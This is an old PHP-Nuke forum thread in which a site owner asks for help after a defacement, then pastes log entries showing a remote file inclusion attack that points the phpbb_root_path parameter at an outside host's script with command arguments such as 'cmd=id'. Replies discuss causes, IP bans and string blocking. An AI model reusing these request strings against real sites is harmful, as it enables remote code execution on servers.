| Author |
Message |
LeapingLizard
New Member
Joined: Dec 11, 2005
Posts: 9
|
 Posted:
Thu Jun 08, 2006 3:30 pm |
 
|
Raven,
Hey this is Scott. Been running the security patches you installed for months now and things are going great. No more admin issues etc.. I run Nuke 7.0
Today I'm not sure how they did it because my index.php file is ok, but if you load my site directly typing in I get a screen that says:
=====================
Hacked By GodSmacK
=====================
If I type
My site loads perfectly as do all the other pages? How are they doing this and how can i correct it? PM me when you get a second.
Thanks,
Scott |
|
|
 
|
|
gregexp
The Mouse Is Extension Of Arm
Joined: Feb 21, 2006
Posts: 1472
Location: In front of a screen....HELP! lol
|
| Posted:
Thu Jun 08, 2006 3:43 pm |
|
check to see if there is an index.html
as it will try to find that first |
|
|
  
  |
|
LeapingLizard
New Member
Joined: Dec 11, 2005
Posts: 9
|
| Posted:
Thu Jun 08, 2006 3:45 pm |
|
This post is probably in the wrong area for starters and I apologize for that.
Well I kind of figured out what was changed.
My Index.php files are file, but some how they changed my index.html file to this:
| Code: | | Can't post the code, but it was changed. |
Same questions applies, how did they do that and how can I stop it?
Thanks,
Scott |
|
|
|
|
|
LeapingLizard
New Member
Joined: Dec 11, 2005
Posts: 9
|
| Posted:
Thu Jun 08, 2006 3:46 pm |
|
Yep that was it, but not sure how to keep them out. |
|
|
|
|
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 4852
|
| Posted:
Thu Jun 08, 2006 3:47 pm |
|
Do you know if the permissions were set to allow writing? Most likely, they scanned your site to find files that could be overwritten, then used another attack to overwrite the file. |
|
|
|
|
|
LeapingLizard
New Member
Joined: Dec 11, 2005
Posts: 9
|
| Posted:
Thu Jun 08, 2006 3:50 pm |
|
I went back to my original back up of my site that i did two days ago and i did not have an index.html file in my back up.
Could they have inserted that?
I deleted that file and site is back on track normally. Weird... |
|
|
|
|
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 4852
|
| Posted:
Thu Jun 08, 2006 3:53 pm |
|
Usually not without FTP or control panel access, unless you use a non-standard module that allows uploads. |
|
|
|
|
|
gregexp
The Mouse Is Extension Of Arm
Joined: Feb 21, 2006
Posts: 1472
Location: In front of a screen....HELP! lol
|
| Posted:
Thu Jun 08, 2006 4:13 pm |
|
im not sure how but i think they wrote a php code...fopen ussually does the trick..and wrote to it....do u allow anything uploaded to ur site? |
|
|
|
|
|
LeapingLizard
New Member
Joined: Dec 11, 2005
Posts: 9
|
| Posted:
Thu Jun 08, 2006 4:29 pm |
|
Yes the only thing i allow to be uploaded are the Avatars. Funny this started to happen all of a sudden becasue i just turned on the upload Avatar function.
Do you think that is causing the issue? |
|
|
|
|
|
gregexp
The Mouse Is Extension Of Arm
Joined: Feb 21, 2006
Posts: 1472
Location: In front of a screen....HELP! lol
|
| Posted:
Thu Jun 08, 2006 4:33 pm |
|
im goin to try a hack on mysite to see. |
|
|
|
|
|
LeapingLizard
New Member
Joined: Dec 11, 2005
Posts: 9
|
| Posted:
Thu Jun 08, 2006 4:44 pm |
|
Here is the Log entry that showed up around the time it happened:
| Code: | 85.106.213.224
Get-Address
/modules/Forums/admin/index.php?phpbb_root_path=http%3A%2F%2Fexploitarsivi.atspace.com%2F030.txt%3Fcmd&act=ls&d=%2Fhome%2Fsweptlin%2Fpublic_html%2F&sort=0a
|
|
|
|
|
|
|
LeapingLizard
New Member
Joined: Dec 11, 2005
Posts: 9
|
| Posted:
Thu Jun 08, 2006 4:52 pm |
|
This is the last entry and looks like this is the one that did it, maybe i shouldn't be posting this...:
| Code: | 85.106.213.224
/modules/Forums/admin/index.php?phpbb_root_path=http://exploitarsivi.atspace.com/030.txt?cmd=id
|
I did go ahead and ban thier IP range.
85.106.128.0 - 85.106.255.255
netname: TurkTelekom
descr: Turk Telekom ADSL-alcatel
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
notify: ***@telekom.gov.tr
changed: ***@telekom.gov.tr 20051026
source: RIPE |
|
|
|
|
|
gregexp
The Mouse Is Extension Of Arm
Joined: Feb 21, 2006
Posts: 1472
Location: In front of a screen....HELP! lol
|
| Posted:
Thu Jun 08, 2006 5:02 pm |
|
after attempting that on my site...sentinel caught me...with ease and i tried to upload somethin to my avatars that was actually a script renamed but it wouldnt take.
I tried every input on my site...and nothing and i mean nothing would take...now im not very knowledgable on hacks..but i can tell...no1 will input a script that will function into any inputs i got...sorry to say...im at a dead end |
|
|
|
|
|
persona_non_grata
Joined:
Posts: 0
|
| Posted:
Thu Jun 08, 2006 7:02 pm |
|
well this is one of the most common they use...
but its not only towards phpnuke nuke....its targeted to phpbb standalone,postnuke,my-gallery,gallery etc.... |
|
|
|
|
|
bugsTHoR
Worker
Joined: Apr 05, 2006
Posts: 172
|
| Posted:
Wed Aug 16, 2006 3:06 pm |
|
is their a way of testing the security myself on my site so i know i cant be hacked anyway at all.
i got 7.6 raven 2.2.2 all updates , its catching alot , but i want all holes filled (not mine lol)
the only add-ons i got installed is shout box 8.5 and doant o meter (not working as yet) and server monitor(game monitor ) |
|
|
|
|
|
evaders99
Moderator
Joined: Apr 30, 2004
Posts: 2845
|
| Posted:
Sat Aug 19, 2006 2:11 am |
|
There are lots of vulnerabilities you can search for... we won't post them here. |
|
|
|
|
|
bugsTHoR
Worker
Joined: Apr 05, 2006
Posts: 172
|
| Posted:
Sun Aug 20, 2006 5:57 pm |
|
Rgr that evaders99, was`nt asking for the code i got me a hacker and all his codes thx  since my asking , just to test ..anyways,
i turned off sentinel ...AAhhh i here you shout, well i switched database to one called
catch_memy_hacker , with a 1 month old backup
and all new folders he could play with  insert really Evil laugh**
.....It worked he used lots of code thorugh address bar before he could get in, (i will send you the printscreens/codes if ya really want it to see if its something new) only you guys though..he``s No script kiddie me thinks??? i think he knows exactly what he does himself
his IP is 81.76.121.209 which is leeds ..but its only his host IP not his ...how do i get him please? pm me if needed |
|
|
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 4816
|
| Posted:
Sun Aug 20, 2006 6:42 pm |
|
You need to look closely at the string manipulation he used, you will probably find that he came from site x and connected with site y which is compromised and used that to eventually get to your site.
I'm seeing this more and more often.
Th problem with this type of attack is if you rely solely on the referer, it is going to give you the wrong data (site y in this example). |
|
|
|
|
|
bugsTHoR
Worker
Joined: Apr 05, 2006
Posts: 172
|
| Posted:
Sun Aug 20, 2006 10:18 pm |
|
rgr that , ibanned this IP, but i want this guy really bad anyway to get catch him at all , ill try anything for testing purposes |
|
|
|
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 7452
Location: Arizona
|
| Posted:
Mon Aug 21, 2006 6:47 am |
|
Maybe try adding a string in the string blocker. Problem is, though, they may even just change that as they use someone else's site they have compromised to issue a new attack. It is endless... all that "talent" wasted. |
|
|
|
|
|
bugsTHoR
Worker
Joined: Apr 05, 2006
Posts: 172
|
| Posted:
Tue Aug 22, 2006 5:24 pm |
|
well i found out by pure chance that my abuse/abuse.html works lol
 |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
